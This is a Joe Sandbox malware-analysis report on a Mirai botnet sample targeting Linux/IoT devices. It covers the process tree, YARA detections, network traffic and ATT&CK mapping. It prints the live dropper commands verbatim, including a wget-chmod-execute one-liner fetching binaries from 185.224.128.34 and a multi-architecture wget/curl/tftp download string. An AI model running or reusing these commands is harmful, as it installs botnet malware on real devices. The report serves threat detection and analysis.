Edit tour

Linux Analysis Report

Overview

General Information

Analysis ID:	1417428
Infos:

Detection

Mirai

Score:	68
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Yara detected Mirai

Sample deletes itself

Detected TCP or UDP traffic on non-standard ports

Executes the "chmod" command used to modify permissions

Executes the "rm" command used to delete files or directories

Executes the "wget" command typically used for HTTP/S downloading

Found strings indicative of a multi-platform dropper

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Sample tries to set the executable flag

Sets full permissions to files and/or directories

Uses the "uname" system call to query kernel version information (possible evasion)

Writes ELF files to disk

Yara signature match

Classification

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1417428
Start date and time:	2024-03-29 09:24:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxcmdlinecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Detection:	MAL
Classification:	mal68.troj.evad.lin@0/2@1/0

Warnings

HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Runtime Messages

Command:	/bin/sh -c "cd /tmp; rm -rf shk; wget http:/185.224.128.34/shk; chmod 777 shk; ./shk tplink; rm -rf shk"
PID:	6211
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:	--2024-03-29 09:24:47-- http://185.224.128.34/shk Connecting to 185.224.128.34:80... connected. HTTP request sent, awaiting response... 200 OK Length: 477 Saving to: shk 0K 100% 625K=0.001s 2024-03-29 09:24:47 (625 KB/s) - shk saved [477/477] --2024-03-29 09:24:47-- http://185.224.128.34/mips Connecting to 185.224.128.34:80... connected. HTTP request sent, awaiting response... 200 OK Length: 71788 (70K) Saving to: system 0K .......... .......... .......... .......... .......... 71% 141K 0s 50K .......... .......... 100% 543K=0.4s 2024-03-29 09:24:48 (179 KB/s) - system saved [71788/71788]

Process Tree

system is lnxubuntu20

sh (PID: 6211, Parent: 6128, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "cd /tmp; rm -rf shk; wget http://185.224.128.34/shk; chmod 777 shk; ./shk tplink; rm -rf shk"

sh New Fork (PID: 6212, Parent: 6211)

rm (PID: 6212, Parent: 6211, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf shk

sh New Fork (PID: 6213, Parent: 6211)

wget (PID: 6213, Parent: 6211, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget http://185.224.128.34/shk

sh New Fork (PID: 6215, Parent: 6211)

chmod (PID: 6215, Parent: 6211, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 shk

sh New Fork (PID: 6216, Parent: 6211)

sh (PID: 6216, Parent: 6211, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh ./shk tplink

sh New Fork (PID: 6217, Parent: 6216)

rm (PID: 6217, Parent: 6216, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf system

sh New Fork (PID: 6218, Parent: 6216)

rm (PID: 6218, Parent: 6216, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf mips

sh New Fork (PID: 6219, Parent: 6216)

wget (PID: 6219, Parent: 6216, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget http://185.224.128.34/mips -O system

sh New Fork (PID: 6220, Parent: 6216)

chmod (PID: 6220, Parent: 6216, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 system

sh New Fork (PID: 6221, Parent: 6216)

system (PID: 6221, Parent: 6216, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: ./system tplink

system New Fork (PID: 6223, Parent: 6221)

system New Fork (PID: 6225, Parent: 6221)

system New Fork (PID: 6227, Parent: 6225)

sh New Fork (PID: 6233, Parent: 6216)

rm (PID: 6233, Parent: 6216, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf system

sh New Fork (PID: 6234, Parent: 6211)

rm (PID: 6234, Parent: 6211, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf shk

dash New Fork (PID: 6298, Parent: 4333)

rm (PID: 6298, Parent: 4333, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.aWATdU1QF5 /tmp/tmp.PRIH5wqT7Y /tmp/tmp.Cs4hpwviby

dash New Fork (PID: 6299, Parent: 4333)

rm (PID: 6299, Parent: 4333, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.aWATdU1QF5 /tmp/tmp.PRIH5wqT7Y /tmp/tmp.Cs4hpwviby

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
/tmp/system	JoeSecurity_Mirai_5	Yara detected Mirai	Joe Security
/tmp/system	MAL_ELF_LNX_Mirai_Oct10_2	Detects ELF malware Mirai related	Florian Roth	0x102a8:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A

Memory Dumps

Source	Rule	Description	Author	Strings
6227.1.00007efdd0400000.00007efdd0411000.r-x.sdmp	JoeSecurity_Mirai_5	Yara detected Mirai	Joe Security
6227.1.00007efdd0400000.00007efdd0411000.r-x.sdmp	MAL_ELF_LNX_Mirai_Oct10_2	Detects ELF malware Mirai related	Florian Roth	0x102a8:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
6225.1.00007efdd0400000.00007efdd0411000.r-x.sdmp	JoeSecurity_Mirai_5	Yara detected Mirai	Joe Security
6225.1.00007efdd0400000.00007efdd0411000.r-x.sdmp	MAL_ELF_LNX_Mirai_Oct10_2	Detects ELF malware Mirai related	Florian Roth	0x102a8:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
6223.1.00007efdd0400000.00007efdd0411000.r-x.sdmp	JoeSecurity_Mirai_5	Yara detected Mirai	Joe Security
6223.1.00007efdd0400000.00007efdd0411000.r-x.sdmp	MAL_ELF_LNX_Mirai_Oct10_2	Detects ELF malware Mirai related	Florian Roth	0x102a8:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
6221.1.00007efdd0400000.00007efdd0411000.r-x.sdmp	JoeSecurity_Mirai_5	Yara detected Mirai	Joe Security
6221.1.00007efdd0400000.00007efdd0411000.r-x.sdmp	MAL_ELF_LNX_Mirai_Oct10_2	Detects ELF malware Mirai related	Florian Roth	0x102a8:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
Click to see the 3 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: /tmp/system

Avira: detection malicious, Label: EXP/ELF.Agent.J.8

Source: shk.14.dr	String: cd /tmp \|\| cd /var \|\| cd /dev; wget http://$server_ip/$arch -O $binout \|\| curl -O $binout http://$server_ip/$arch \|\| tftp -g -l $binout -r $arch $server_ip
Source: system.24.dr	String: /system/proc/self/exe/proc/proc//cmdlineld.sowgettftpcurl/exe

Source: global traffic

TCP traffic: 192.168.2.23:36034 -> 185.224.128.34:33335

Source: /bin/sh (PID: 6213)	Wget executable: /usr/bin/wget -> wget http://185.224.128.34/shk			Jump to behavior
Source: /bin/sh (PID: 6219)	Wget executable: /usr/bin/wget -> wget http://185.224.128.34/mips -O system			Jump to behavior

Source: /tmp/system (PID: 6221)

Socket: 127.0.0.1::33337

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 106.148.45.41
Source: unknown	TCP traffic detected without corresponding DNS query: 200.149.252.41
Source: unknown	TCP traffic detected without corresponding DNS query: 223.68.120.41
Source: unknown	TCP traffic detected without corresponding DNS query: 150.96.78.16
Source: unknown	TCP traffic detected without corresponding DNS query: 78.62.8.114
Source: unknown	TCP traffic detected without corresponding DNS query: 249.225.40.54
Source: unknown	TCP traffic detected without corresponding DNS query: 137.203.160.108
Source: unknown	TCP traffic detected without corresponding DNS query: 32.142.109.173
Source: unknown	TCP traffic detected without corresponding DNS query: 129.109.37.211
Source: unknown	TCP traffic detected without corresponding DNS query: 12.61.57.1
Source: unknown	TCP traffic detected without corresponding DNS query: 143.102.55.216
Source: unknown	TCP traffic detected without corresponding DNS query: 85.108.69.44
Source: unknown	TCP traffic detected without corresponding DNS query: 51.207.27.93
Source: unknown	TCP traffic detected without corresponding DNS query: 106.188.187.62
Source: unknown	TCP traffic detected without corresponding DNS query: 108.84.81.58
Source: unknown	TCP traffic detected without corresponding DNS query: 77.185.84.58
Source: unknown	TCP traffic detected without corresponding DNS query: 249.76.250.189
Source: unknown	TCP traffic detected without corresponding DNS query: 199.15.94.9
Source: unknown	TCP traffic detected without corresponding DNS query: 136.7.114.33
Source: unknown	TCP traffic detected without corresponding DNS query: 25.75.3.40
Source: unknown	TCP traffic detected without corresponding DNS query: 246.184.16.162
Source: unknown	TCP traffic detected without corresponding DNS query: 109.172.227.147
Source: unknown	TCP traffic detected without corresponding DNS query: 25.90.213.142
Source: unknown	TCP traffic detected without corresponding DNS query: 205.200.24.255
Source: unknown	TCP traffic detected without corresponding DNS query: 71.24.26.169
Source: unknown	TCP traffic detected without corresponding DNS query: 135.152.8.218
Source: unknown	TCP traffic detected without corresponding DNS query: 118.3.19.175
Source: unknown	TCP traffic detected without corresponding DNS query: 76.149.240.145
Source: unknown	TCP traffic detected without corresponding DNS query: 164.245.75.94
Source: unknown	TCP traffic detected without corresponding DNS query: 133.165.237.162
Source: unknown	TCP traffic detected without corresponding DNS query: 191.134.200.230
Source: unknown	TCP traffic detected without corresponding DNS query: 20.149.69.44
Source: unknown	TCP traffic detected without corresponding DNS query: 245.180.32.248
Source: unknown	TCP traffic detected without corresponding DNS query: 63.188.242.150
Source: unknown	TCP traffic detected without corresponding DNS query: 155.149.137.144
Source: unknown	TCP traffic detected without corresponding DNS query: 254.101.85.223
Source: unknown	TCP traffic detected without corresponding DNS query: 215.227.236.246
Source: unknown	TCP traffic detected without corresponding DNS query: 79.94.26.119
Source: unknown	TCP traffic detected without corresponding DNS query: 46.75.183.200
Source: unknown	TCP traffic detected without corresponding DNS query: 97.243.62.227
Source: unknown	TCP traffic detected without corresponding DNS query: 205.59.146.130
Source: unknown	TCP traffic detected without corresponding DNS query: 195.182.43.120
Source: unknown	TCP traffic detected without corresponding DNS query: 246.146.104.30
Source: unknown	TCP traffic detected without corresponding DNS query: 41.171.76.135
Source: unknown	TCP traffic detected without corresponding DNS query: 141.37.74.243
Source: unknown	TCP traffic detected without corresponding DNS query: 33.86.44.99
Source: unknown	TCP traffic detected without corresponding DNS query: 89.254.150.24
Source: unknown	TCP traffic detected without corresponding DNS query: 35.118.4.255
Source: unknown	TCP traffic detected without corresponding DNS query: 68.38.166.33
Source: unknown	TCP traffic detected without corresponding DNS query: 162.66.218.70

Source: global traffic	HTTP traffic detected: GET /shk HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 185.224.128.34Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mips HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 185.224.128.34Connection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: rooty.cc

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39250
Source: unknown	Network traffic detected: HTTP traffic on port 33606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39250 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: 6227.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY	Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Source: 6225.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY	Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Source: 6223.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY	Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Source: 6221.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY	Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Source: /tmp/system, type: DROPPED	Matched rule: Detects ELF malware Mirai related Author: Florian Roth

Source: /tmp/system (PID: 6225)	SIGKILL sent: pid: 6223, result: successful	Jump to behavior
Source: /tmp/system (PID: 6225)	SIGKILL sent: pid: 6227, result: successful	Jump to behavior
Source: /tmp/system (PID: 6225)	SIGKILL sent: pid: -6225, result: unknown	Jump to behavior

Source: 6227.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY	Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Source: 6225.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY	Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Source: 6223.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY	Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Source: 6221.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY	Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Source: /tmp/system, type: DROPPED	Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research

Source: classification engine

Classification label: mal68.troj.evad.lin@0/2@1/0

Source: /bin/sh (PID: 6215)	Chmod executable: /usr/bin/chmod -> chmod 777 shk			Jump to behavior
Source: /bin/sh (PID: 6220)	Chmod executable: /usr/bin/chmod -> chmod 777 system			Jump to behavior

Source: /bin/sh (PID: 6212)	Rm executable: /usr/bin/rm -> rm -rf shk	Jump to behavior
Source: /bin/sh (PID: 6217)	Rm executable: /usr/bin/rm -> rm -rf system	Jump to behavior
Source: /bin/sh (PID: 6218)	Rm executable: /usr/bin/rm -> rm -rf mips	Jump to behavior
Source: /bin/sh (PID: 6233)	Rm executable: /usr/bin/rm -> rm -rf system	Jump to behavior
Source: /bin/sh (PID: 6234)	Rm executable: /usr/bin/rm -> rm -rf shk	Jump to behavior
Source: /usr/bin/dash (PID: 6298)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.aWATdU1QF5 /tmp/tmp.PRIH5wqT7Y /tmp/tmp.Cs4hpwviby	Jump to behavior
Source: /usr/bin/dash (PID: 6299)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.aWATdU1QF5 /tmp/tmp.PRIH5wqT7Y /tmp/tmp.Cs4hpwviby	Jump to behavior

Source: /bin/sh (PID: 6213)	Wget executable: /usr/bin/wget -> wget http://185.224.128.34/shk			Jump to behavior
Source: /bin/sh (PID: 6219)	Wget executable: /usr/bin/wget -> wget http://185.224.128.34/mips -O system			Jump to behavior

Source: /usr/bin/chmod (PID: 6215)	File: /tmp/shk (bits: - usr: rwx grp: rwx all: rwx)			Jump to behavior
Source: /usr/bin/chmod (PID: 6220)	File: /tmp/system (bits: - usr: rwx grp: rwx all: rwx)			Jump to behavior

Source: /bin/sh (PID: 6215)	Chmod executable with 777: /usr/bin/chmod -> chmod 777 shk			Jump to behavior
Source: /bin/sh (PID: 6220)	Chmod executable with 777: /usr/bin/chmod -> chmod 777 system			Jump to behavior

Source: /usr/bin/wget (PID: 6219)

File written: /tmp/system

Jump to dropped file

Source: submitted sample

Stderr: --2024-03-29 09:24:47-- http://185.224.128.34/shkConnecting to 185.224.128.34:80... connected.HTTP request sent, awaiting response... 200 OKLength: 477Saving to: shk 0K 100% 625K=0.001s2024-03-29 09:24:47 (625 KB/s) - shk saved [477/477]--2024-03-29 09:24:47-- http://185.224.128.34/mipsConnecting to 185.224.128.34:80... connected.HTTP request sent, awaiting response... 200 OKLength: 71788 (70K)Saving to: system 0K .......... .......... .......... .......... .......... 71% 141K 0s 50K .......... .......... 100% 543K=0.4s2024-03-29 09:24:48 (179 KB/s) - system saved [71788/71788]: exit code = 0

Hooking and other Techniques for Hiding and Protection

Sample deletes itself

Source: /usr/bin/rm (PID: 6217)	File: /tmp/system			Jump to behavior
Source: /usr/bin/rm (PID: 6233)	File: /tmp/system			Jump to behavior

Source: /tmp/system (PID: 6221)

Queries kernel information via 'uname':

Jump to behavior

Source: sh, 6221.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6221.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6223.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6225.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6227.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mips
Source: sh, 6221.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6221.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6223.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6225.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6227.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips
Source: sh, 6221.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6221.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6223.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6225.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp, system, 6227.1.000055cbc6d30000.000055cbc6db7000.rw-.sdmp	Binary or memory string: U1!/etc/qemu-binfmt/mips
Source: sh, 6221.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6221.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6223.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6225.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp, system, 6227.1.00007ffd90d55000.00007ffd90d76000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mips./systemtplinkSUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootOLDPWD=/tmpCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/tmp./system

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: 6227.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6225.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6223.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6221.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: /tmp/system, type: DROPPED

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: 6227.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6225.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6223.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6221.1.00007efdd0400000.00007efdd0411000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: /tmp/system, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	Path Interception	2 File and Directory Permissions Modification	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 File Deletion	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Source	Detection	Scanner	Label	Link
/tmp/system	100%	Avira	EXP/ELF.Agent.J.8
/tmp/system	46%	ReversingLabs	Linux.Trojan.Mirai

Domains

Source	Detection	Scanner	Label	Link
rooty.cc	8%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://185.224.128.34/mips	0%	Avira URL Cloud	safe
http://185.224.128.34/shk	0%	Avira URL Cloud	safe
http://185.224.128.34/mips	19%	Virustotal		Browse
http://185.224.128.34/shk	19%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
rooty.cc	185.224.128.34	true	false	8%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.224.128.34/mips	false	19%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.224.128.34/shk	false	19%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
25.186.29.17	unknown	United Kingdom	7922	COMCAST-7922US	false
107.212.160.104	unknown	United States	7018	ATT-INTERNET4US	false
117.91.172.124	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
142.155.153.213	unknown	Canada	26677	ORION-ASNCA	false
214.19.20.100	unknown	United States	367	DNIC-ASBLK-00306-00371US	false
118.3.19.175	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
98.168.167.168	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
20.149.69.44	unknown	United States	4237	CSC-IGN-FTWUS	false
253.128.244.98	unknown	Reserved	unknown	unknown	false
112.137.186.237	unknown	Japan	23637	BI-CDN-IXEquinixJpapanEnterpriseKKJP	false
64.19.147.27	unknown	United States	7078	MONMOUTHUS	false
140.45.6.27	unknown	United States	668	DNIC-AS-00668US	false
196.174.184.99	unknown	Ghana	37140	zain-asGH	false
159.232.171.75	unknown	Switzerland	13188	TRIOLANUA	false
178.19.54.207	unknown	Iceland	44735	SIP-ASNIS	false
170.150.164.106	unknown	Brazil	28130	CERTTOTELECOMUNICACOESLTDAEPPBR	false
205.59.146.130	unknown	United States	647	DNIC-ASBLK-00616-00665US	false
138.105.211.235	unknown	United States	4637	ASN-TELSTRA-GLOBALTelstraGlobalHK	false
27.123.186.212	unknown	Fiji	38442	VODAFONEFIJI-AS-FJVodafoneFijiLimitedFJ	false
149.127.94.136	unknown	United States	174	COGENT-174US	false
16.0.75.111	unknown	United States	unknown	unknown	false
162.66.218.70	unknown	United States	35893	ACPCA	false
245.180.32.248	unknown	Reserved	unknown	unknown	false
254.101.85.223	unknown	Reserved	unknown	unknown	false
246.184.16.162	unknown	Reserved	unknown	unknown	false
102.221.5.1	unknown	unknown	36926	CKL1-ASNKE	false
145.146.246.103	unknown	Netherlands	1103	SURFNET-NLSURFnetTheNetherlandsNL	false
52.186.157.23	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
151.54.223.95	unknown	Italy	1267	ASN-WINDTREIUNETEU	false
86.251.101.150	unknown	France	3215	FranceTelecom-OrangeFR	false
138.231.213.68	unknown	France	2426	FR-RENATER-RUBISRUBISMetropolitanAreaNetworkEU	false
35.118.4.255	unknown	United States	237	MERIT-AS-14US	false
133.165.237.162	unknown	Japan	11363	FUJITSU-USAUS	false
19.196.210.101	unknown	United States	3	MIT-GATEWAYSUS	false
136.164.80.135	unknown	Norway	42175	STAOIL-ASNO	false
247.250.115.207	unknown	Reserved	unknown	unknown	false
115.117.247.27	unknown	India	4755	TATACOMM-ASTATACommunicationsformerlyVSNLisLeadingISP	false
130.74.148.203	unknown	United States	25656	OLEMISSSUS	false
12.32.11.133	unknown	United States	7018	ATT-INTERNET4US	false
92.176.250.51	unknown	France	12479	UNI2-ASES	false
136.166.243.129	unknown	United States	53380	LGCNS-ASUS	false
206.177.112.156	unknown	Canada	11736	USDUS	false
151.250.138.254	unknown	Turkey	34984	TELLCOM-ASTR	false
39.235.255.226	unknown	Indonesia	23693	TELKOMSEL-ASN-IDPTTelekomunikasiSelularID	false
129.134.47.150	unknown	United States	32934	FACEBOOKUS	false
174.128.255.203	unknown	United States	46844	ST-BGPUS	false
161.224.204.232	unknown	United States	396269	BPL-ASNUS	false
191.134.200.230	unknown	Brazil	26615	TIMSABR	false
77.150.114.125	unknown	France	15557	LDCOMNETFR	false
109.39.218.145	unknown	Netherlands	15480	VFNL-ASVodafoneNLAutonomousSystemNL	false
178.166.232.106	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
242.4.139.255	unknown	Reserved	unknown	unknown	false
146.166.141.218	unknown	United States	14977	STATE-OF-WYOMING-ASNUS	false
87.88.109.146	unknown	France	5410	BOUYGTEL-ISPFR	false
41.171.76.135	unknown	South Africa	36937	Neotel-ASZA	false
211.38.62.100	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
28.237.108.227	unknown	United States	7922	COMCAST-7922US	false
98.238.55.232	unknown	United States	7922	COMCAST-7922US	false
21.46.80.3	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
131.69.86.207	unknown	United States	138	DNIC-AS-00138US	false
75.23.105.155	unknown	United States	7018	ATT-INTERNET4US	false
146.156.8.212	unknown	United States	197938	TRAVIANGAMESDE	false
123.252.186.59	unknown	India	134540	TTML-AS-APTataTeleservicesMaharashtraLtdIN	false
109.172.227.147	unknown	Georgia	16010	MAGTICOMASCaucasus-OnlineGE	false
149.154.18.100	unknown	United States	43074	KLASIE	false
65.9.99.136	unknown	United States	16509	AMAZON-02US	false
218.139.43.107	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
251.101.67.12	unknown	Reserved	unknown	unknown	false
70.42.217.2	unknown	United States	10910	INTERNAP-BLKUS	false
145.4.180.30	unknown	Netherlands	702	UUNETUS	false
89.254.150.24	unknown	Latvia	41563	OST-ASOSTKOMSIALV	false
